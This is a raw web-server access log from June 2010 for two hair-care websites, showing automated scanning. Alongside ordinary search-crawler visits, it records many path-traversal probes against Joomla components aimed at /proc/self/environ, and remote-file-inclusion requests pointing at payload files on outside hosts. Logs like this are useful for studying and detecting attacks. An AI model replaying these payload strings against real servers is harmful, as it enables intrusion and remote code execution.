206.214.220.151 - - [21/Jun/2010:10:58:43 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.175.165.14 - - [21/Jun/2010:10:59:01 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
79.175.165.14 - - [21/Jun/2010:10:59:02 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
79.175.165.14 - - [21/Jun/2010:10:59:02 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
79.175.165.14 - - [21/Jun/2010:10:59:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
79.175.165.14 - - [21/Jun/2010:11:01:37 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:11:02:13 -0700] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:11:03:02 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:11:03:02 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:11:03:03 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
178.32.3.34 - - [21/Jun/2010:11:03:17 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
178.32.3.34 - - [21/Jun/2010:11:03:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
178.32.3.34 - - [21/Jun/2010:11:03:17 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:11:05:29 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:11:05:30 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:11:05:30 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:11:06:39 -0700] "GET /logs/access.log/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:11:06:40 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:11:06:40 -0700] "GET /logs/?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.156.24.220 - - [21/Jun/2010:11:09:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
178.32.3.34 - - [21/Jun/2010:11:10:02 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
178.32.3.34 - - [21/Jun/2010:11:10:02 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
178.32.3.34 - - [21/Jun/2010:11:10:02 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.156.24.220 - - [21/Jun/2010:11:10:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [21/Jun/2010:11:13:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [21/Jun/2010:11:13:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:11:15:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13444 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
64.156.24.220 - - [21/Jun/2010:11:22:16 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [21/Jun/2010:11:22:16 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [21/Jun/2010:11:22:16 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:22:26 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [21/Jun/2010:11:22:30 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [21/Jun/2010:11:22:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [21/Jun/2010:11:22:30 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:22:52 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:22:59 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.156.24.220 - - [21/Jun/2010:11:23:15 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [21/Jun/2010:11:23:15 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [21/Jun/2010:11:23:15 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [21/Jun/2010:11:23:38 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [21/Jun/2010:11:23:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.156.24.220 - - [21/Jun/2010:11:23:38 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:24:13 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:24:37 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:24:46 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:24:51 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:11:25:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14395 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:26:05 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
203.19.4.18 - - [21/Jun/2010:11:27:24 -0700] "GET /logs/access.log/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.19.4.18 - - [21/Jun/2010:11:27:27 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
203.19.4.18 - - [21/Jun/2010:11:27:32 -0700] "GET /logs/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.805" "growlonghairfast.com"
174.142.61.152 - - [21/Jun/2010:11:34:53 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.61.152 - - [21/Jun/2010:11:34:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.61.152 - - [21/Jun/2010:11:34:53 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:35:24 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:35:25 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:35:25 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
209.116.59.107 - - [21/Jun/2010:11:36:07 -0700] "GET /logs/alpha.php?Absolute_Path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.116.59.107 - - [21/Jun/2010:11:36:08 -0700] "GET /logs/access_100201.log%20%20/alpha.php?Absolute_Path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.116.59.107 - - [21/Jun/2010:11:36:08 -0700] "GET /alpha.php?Absolute_Path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:11:36:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
209.116.59.107 - - [21/Jun/2010:11:36:28 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:11:36:48 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:11:36:48 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:11:36:48 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:11:36:49 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:11:36:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:11:36:50 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
74.52.53.74 - - [21/Jun/2010:11:37:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
74.52.53.74 - - [21/Jun/2010:11:37:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
220.181.7.33 - - [21/Jun/2010:11:38:55 -0700] "GET / HTTP/1.1" 200 926 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:11:39:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15207 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:41:34 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:41:34 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:41:35 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:42:07 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:42:07 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:42:07 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:42:09 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:42:09 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [21/Jun/2010:11:42:09 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:11:43:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18811 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
94.75.226.135 - - [21/Jun/2010:11:44:35 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.75.226.135 - - [21/Jun/2010:11:44:41 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.75.226.135 - - [21/Jun/2010:11:44:46 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.19.4.18 - - [21/Jun/2010:11:50:25 -0700] "GET /logs/access.log/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.19.4.18 - - [21/Jun/2010:11:50:28 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.19.4.18 - - [21/Jun/2010:11:50:30 -0700] "GET /logs/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.113.154.98 - - [21/Jun/2010:11:50:39 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:11:51:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13965 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:11:51:48 -0700] "GET /logs/access_100531.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:11:51:48 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:11:51:48 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:11:51:54 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:11:51:54 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:11:51:54 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:11:52:04 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:11:52:04 -0700] "GET /logs/access_100531.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:11:52:04 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:11:52:04 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:11:52:04 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:11:52:04 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.52.53.74 - - [21/Jun/2010:11:53:35 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
74.52.53.74 - - [21/Jun/2010:11:53:35 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
74.52.53.74 - - [21/Jun/2010:11:53:35 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
91.214.44.233 - - [21/Jun/2010:11:53:39 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
91.214.44.233 - - [21/Jun/2010:11:53:39 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:55:48 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:55:49 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.135 - - [21/Jun/2010:11:55:49 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:11:59:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4707 HTTP/1.1" 200 349 "-" "Yandex/1.01.0